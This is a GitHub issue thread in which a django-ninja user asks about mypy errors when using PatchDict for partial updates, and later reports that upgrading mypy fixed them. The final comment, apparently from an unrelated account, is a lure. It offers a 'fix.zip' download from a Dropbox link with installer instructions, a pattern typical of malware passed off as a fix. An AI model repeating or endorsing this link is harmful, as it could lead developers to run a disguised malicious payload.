### ISSUE TITLE
Mypy complaining about PatchDict

### ISSUE THREAD

**Issue by oscarychen** [vitalik/django-ninja#1279]
Please describe what you are trying to achieve

Please include code examples (like models code, schemes code, view function) to help understand the issue

I'm using PatchDict to extend a Schema so it can be used for partial update. The code functions fine, but I'm not sure how to get around the mypy complaints:

![image](https://github.com/user-attachments/assets/9525bf27-11bb-4bbd-95c1-610f1c5c3c1e)

I'm currently using mypy 1.10.1 with Django-ninja 1.3.0

Here is how I set up this API:

```python
class CreateFacilityPayload(Schema):
    name: str
    ...


PartialUpdateFacilityPayload = PatchDict[CreateFacilityPayload]


@facility_router.patch("/{guid}")
def update_facility(request: HttpRequest, guid: UUID4, payload: PartialUpdateFacilityPayload) -> dict:
    facility = get_object_or_404(Facility, guid=guid)
   
    for key, value in payload.items():
        setattr(facility, key, value)
    facility.save()
    return {"guid": facility.guid}
```

Any suggestion is much appreciated.

**Comment by oscarychen** [comment]
this appears to have gone away after upgrading to mypy 1.11.2.

**Comment by esttemanb** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."
